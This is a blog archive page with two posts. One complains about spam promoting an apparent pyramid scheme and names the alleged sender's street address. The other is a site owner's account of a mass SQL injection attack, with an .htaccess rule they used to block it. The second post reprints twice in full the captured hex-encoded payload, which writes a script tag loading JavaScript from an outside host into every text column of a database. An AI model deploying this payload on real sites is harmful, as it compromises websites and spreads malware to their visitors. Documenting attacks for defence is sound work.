Tag Archive: NC

Massive Spam Hit for Centurion Wealth Circle Pyramid Scheme

Massive Spam Hit

Willie R

Centurion Wealth Circle Spam Deluge

Centurion Wealth Circle Spam Deluge

Over the weekend, I received over 600 spams from someone called Willie R (with a number appended to the name) to my gmail account which I now use for my spam-trapping on an old email address that I use for registrations and the like…  See the screenshot of one page above!

Centurion Wealth Circle

On checking out a sample I found that most point back to Centurion Wealth Circle with a small array of other dubious links included.  The spams I got had almost identical formats (except for differing ‘from’ addresses).  The differences were in a couple of links.  These are the two spam  types:

Type 1: Includes Link to AutoXten.com

CWC Spam Type 1

CWC Spam Type 1

Type 2: Includes Link to TextAdBrokers.com

CWC Spam Type 2

CWC Spam Type 2

The amazing thing taken straight from http://textadbrokers.com/?premier1 is the spelling mistake for their prime selling point!  Under the headline “What is TextAdBrokers?” we see:

TAB was created as the premier Partner for marketing and distribution For the newly created contextual advertising Platform hitcralwer.com

hitcralwer.com (or HitCrawler.com) has already spawned a long chain on Scam.com that starts with a scam warning, then features server outages, lawyer warnings, lawyer bebunkings and various personal threats and revelations about the contributors.  For me, this is all very entertaining stuff, but the key facts for me are that;

  1. I have been heavily spammed, all links tending to the same source and all pointers pointing to the same destination(s).
  2. TAB’s own blurb can’t even spell correctly!

From that, you’ll gather which side of the honesty fence I think this lot come from…!

Willie R Burke kindly leaves his address in one spam type as “41 Merker Dr, Edison, NJ 08837”.  This ties in with the WHOIS of the source.  However, I don’t see why I should have to follow THEIR suggestion to stop the spam coming from them.  After all, I have over 600! The suggestion is not everywhere, but only on some of the pointers.

Five domains are in nearly every spam, (from those that I checked in my deluge.)

These are;

  1. http://vd.autoxten.com
    • –  Under their earnings disclaimer, they claim “that AutoXTen is not a get rich quick scheme but is a business” and that “all customers are essentially purchasing advertising”….?
  2. http://www.centurionwealthcircle.com/?register
    •  – considering the deluge I just got, their spam policy takes some beating!  e.g. “Unsolicited commercial email (UCE), while regarded as legal in some jurisdictions, is regarded as spam by most Internet service providers (ISPs), and may not be used to promote CWC”.  Larry Harper, take note!  I am not prepared to wade through 600 email headers just to prove that your spam policy works…  You do it.  Start with the source.  YOU!
    • Pyramid Details

      CWC Pyramid Details

      CWC

      Their business model is based on buying “tokens”, keeping them as a “portfolio” or something for a bit, and then cashing in 50% of the “investment” at some ill-defined “maturity” point.  Although they claim otherwise, this is classic pyramid scheme technology.  They make clear the exponential growth that potentially exists in their own blurb, and ONLY pyramid schemes promise exponential growth.

  3. http://www.makemoneyonline-free.org/
    • – here I find out that I “have been invited to join ClixSense by robbie1201”.  Oh really!  Thanks for nowt robbie.  It’s a site called “ClikSense, advertising that pays” but the domain name remains the same.  On their user agreement, point 10, Spam Policy, they helpfully remind Robbie and Willie R that “Spamming is a federal crime. Any member caught Spamming will not only have their account terminated immediately and lose any past, present and future earnings, but shall also be held liable for spamming as we shall cooperate with any authorities and investigations that may arise from the spamming incident. ClixSense may fine your account up to $5 per spam email reported from you email address.”    I don’t think they were listening!
  4. http://www.homebasedtelesalesjobs.com/

The registrant of  http://infinityleadsystem.com/ is;

E.C.I.
5802 Bob Bullock C1 Unit 328C-195
Laredo, TX 78041-8813
US

However, the server is located in Quebec, Canada!

Why this should be so when so may sites (like mine here) are served from the massive data centres in the US (like Texas, say!) is beyond me.  But I find the Canadian connection strangely comforting.

Conclusion

It stinks.  From the initial deluge to burrowing through the various “systems”; it stinks.  Leave it well alone folks.  Any business of note should NOT  be resorting to Spam for new business.  The scale of this spam deluge emphasises the non-credibility of these charlatans much more than their cheesy website offering ever could.

The fact that most domains were hidden “for privacy” plus the fact that the websites are almost incomprehensible as they struggle to disguise their real motives and modus operandi are just bonuses!

Related Posts:

Comments are closed

Probable DDOS attack Using SQL Injection on my Websites

Over the last day, my sites have been really slow and twice to my knowledge have tripped out.  I’ve been getting a mysql error message like so when I try to resolve the problem in phpAdmin;

MySQL: ERROR 1040: Too many connections

I tried hosting chat support (as I’m in a hurry) but the connection kept dropping.  During this process Google came to the fore and pushed me down several avenues of investigation.

This was one result, http://rackerhacker.com/2008/06/24/mysql-error-1040-too-many-connections/ from the web, and another from the horse’s mouth http://dev.mysql.com/doc/refman/5.0/en/too-many-connections.html

I then proceeded to check my WordPress plugins but couldn’t because the server wasn’t responding.  When it finally fired back up after quarter of an hour (!), I immediately disabled some OpenID plugins I’ve been playing with on one site and checked my databases were okay.

They were, but during the process I noticed that Wassup was the biggest table – unusually so.  Looking at some of the references in an extended list in the GUI, I noticed that several (random, as far as I could tell), post addresses were extre-e-e-e-e-mely long, terminating in some form of code.  Like so (It’s manually wrapped to fit into my theme);

http://strangelyperfect.tv/68/70s-mixer/?;[email protected]%20

CHAR(4000);[email protected]=CAST(0x4445434C4152452040542

07661726368617228323535292C4043207661726368617

2283430303029204445434C415245205461626C655F437

572736F7220435552534F5220464F522073656C65637420

612E6E616D652C622E6E616D652066726F6D207379736F

626A6563747320612C737973636F6C756D6E7320622077

6865726520612E69643D622E696420616E6420612E7874

7970653D27752720616E642028622E78747970653D3939

206F7220622E78747970653D3335206F7220622E787479

70653D323331206F7220622E78747970653D313637292

04F50454E205461626C655F437572736F7220464554434

8204E4558542046524F4D20205461626C655F437572736

F7220494E544F2040542C4043205748494C45284040464

55443485F5354415455533D302920424547494E206578

65632827757064617465205B272B40542B275D2073657

4205B272B40432B275D3D2727223E3C2F7469746C653E3

C736372697074207372633D22687474703A2F2F777777

302E646F7568756E716E2E636E2F63737273732F772E6A7

3223E3C2F7363726970743E3C212D2D27272B5B272B404

32B275D20776865726520272B40432B27206E6F74206C69

6B6520272725223E3C2F7469746C653E3C73637269707420

7372633D22687474703A2F2F777777302E646F7568756E

716E2E636E2F63737273732F772E6A73223E3C2F7363726

970743E3C212D2D272727294645544348204E455854204

6524F4D20205461626C655F437572736F7220494E544F20

40542C404320454E4420434C4F5345205461626C655F43

7572736F72204445414C4C4F43415445205461626C655F

437572736F72%20AS%20CHAR(4000));EXEC(@S);  (addendum: clickable link removed as I’m using this plugin now)

If you copy & paste and try the link it won’t work now (read on for later ;-) ) but the correct link here does;

http://strangelyperfect.tv/68/70s-mixer/

Before my fix, the first link took the user to the correct page and it displayed in the browser address bar with the long link.  My suspicions were now being raised because the page displayed okay.  This must be all the WordPress updating I’ve done.  It was a couple of updates back the the thing had some SQL Injection resistance built in.  It appears to fall over gracefully by ignoring duff requests.

So I chucked the “extra” part of the link into Google like so.   There are over 6k hits.

These posts got me thinking:

http://www.unsoughtinput.com/index.php/2006/11/09/comment-spam-deluge-did-our-captcha-get-hacked/

http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attack/

http://www.thejoyofcode.com/Stop_trying_to_hack_me.aspx

and a neat fix that I’ve implemented I found here.

http://www.ravenphpscripts.com/postp122652.html (link removed as they’ve gone a bit funny all of a sudden)

What I’ve done is added the suggested code to my .htaccess file, like so:

# Added, protect from SQL Injection (sourced from) http://www.ravenphpscripts.com/postp122652.html
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.+DECLARE(%20)+@ [NC]
RewriteRule ^.* – [F,L]

This has done the trick.  Anything banging into my site with that in the string, is rejected.  I haven’t implemented a polite screen.  It just gets the standard response from my host as you’d have found with the first of my links above.

It’ll probably need twiddling in future but it’s okay for now.

Another similar link was:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

/?;[email protected]%20CHAR(4000);[email protected]=CAST(0x4445434

C415245204054207661726368617228323535292C4043207

6617263686172283430303029204445434C4152452054616

26C655F437572736F7220435552534F5220464F522073656C

65637420612E6E616D652C622E6E616D652066726F6D2073

79736F626A6563747320612C737973636F6C756D6E732062

20776865726520612E69643D622E696420616E6420612E78

747970653D27752720616E642028622E78747970653D3939

206F7220622E78747970653D3335206F7220622E787479706

53D323331206F7220622E78747970653D31363729204F5045

4E205461626C655F437572736F72204645544348204E45585

42046524F4D20205461626C655F437572736F7220494E544F

2040542C4043205748494C4528404046455443485F535441

5455533D302920424547494E206578656328277570646174

65205B272B40542B275D20736574205B272B40432B275D3D

2727223E3C2F7469746C653E3C736372697074207372633D

22687474703A2F2F777777302E646F7568756E716E2E636E2

F63737273732F772E6A73223E3C2F7363726970743E3C212D

2D27272B5B272B40432B275D20776865726520272B40432B

27206E6F74206C696B6520272725223E3C2F7469746C653E3

C736372697074207372633D22687474703A2F2F777777302

E646F7568756E716E2E636E2F63737273732F772E6A73223E

3C2F7363726970743E3C212D2D272727294645544348204E

4558542046524F4D20205461626C655F437572736F722049

4E544F2040542C404320454E4420434C4F5345205461626C

655F437572736F72204445414C4C4F43415445205461626C6

55F437572736F72%20AS%20CHAR(4000));EXEC(@S);

which should point to:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

This was especially troublesome as the post title was long anyway so it looked in the browser address bar that everything was okay!

Related Posts:

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me